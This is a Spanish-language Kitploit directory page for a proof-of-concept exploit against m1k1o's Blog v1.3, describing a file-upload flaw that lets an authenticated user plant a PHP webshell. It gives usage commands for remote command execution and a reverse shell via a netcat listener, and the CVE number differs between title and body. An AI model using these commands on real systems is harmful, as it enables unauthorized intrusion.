Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cve-2022-23636-poc — Exploit de ejecución remota de código autenticado para el Blog v1.3 de m1k1o a través de carga de archivos no validada, con capacidades de despliegue de webshell y shell inversa. | Kitploit
Herramientas/GitHubGitHub/cyhe50/cve-2022-23636-poc
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubcyhe50/cve-2022-23636-poc

cve-2022-23636-poc

Exploit de ejecución remota de código autenticado para el Blog v1.3 de m1k1o a través de carga de archivos no validada, con capacidades de despliegue de webshell y shell inversa.

Ver Repositorio
hace 4 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2022-23626 - m1k1o's Blog RCE Autenticado

Ejecución Remota de Código Autenticada a través de una vulnerabilidad de carga de archivos en m1k1o's Blog v1.3 y anteriores.

Descripción

El endpoint ajax.php?action=upload_image no valida correctamente los tipos de archivo subidos, permitiendo que un usuario autenticado suba un webshell PHP disfrazado como imagen. El atacante puede entonces desencadenar la ejecución solicitando directamente el archivo subido.

Referencias

  • EDB-50943
  • CVE-2022-23626
  • m1k1o/blog GitHub

Versión afectada

  • m1k1o's Blog v1.3 y anteriores

Requisitos

  • Python 3
  • librería requests
root@kitploit:~
pip install requests

Uso

Ejecutar un comando

root@kitploit:~
python3 cve-2022-23626.py --url http://target:8081 -u admin -p admin -c "id"

Shell inversa

Primero inicie un listener:

root@kitploit:~
nc -lnvp 4444

Luego ejecute:

root@kitploit:~
python3 cve-2022-23626.py --url http://target:8081 -u admin -p admin -lh 10.10.14.2 -lp 4444

Descargo de responsabilidad

Esta herramienta está destinada únicamente a pruebas de seguridad autorizadas y fines educativos. Úsela solo en sistemas en los que tenga permiso explícito para realizar pruebas.

Descargar herramienta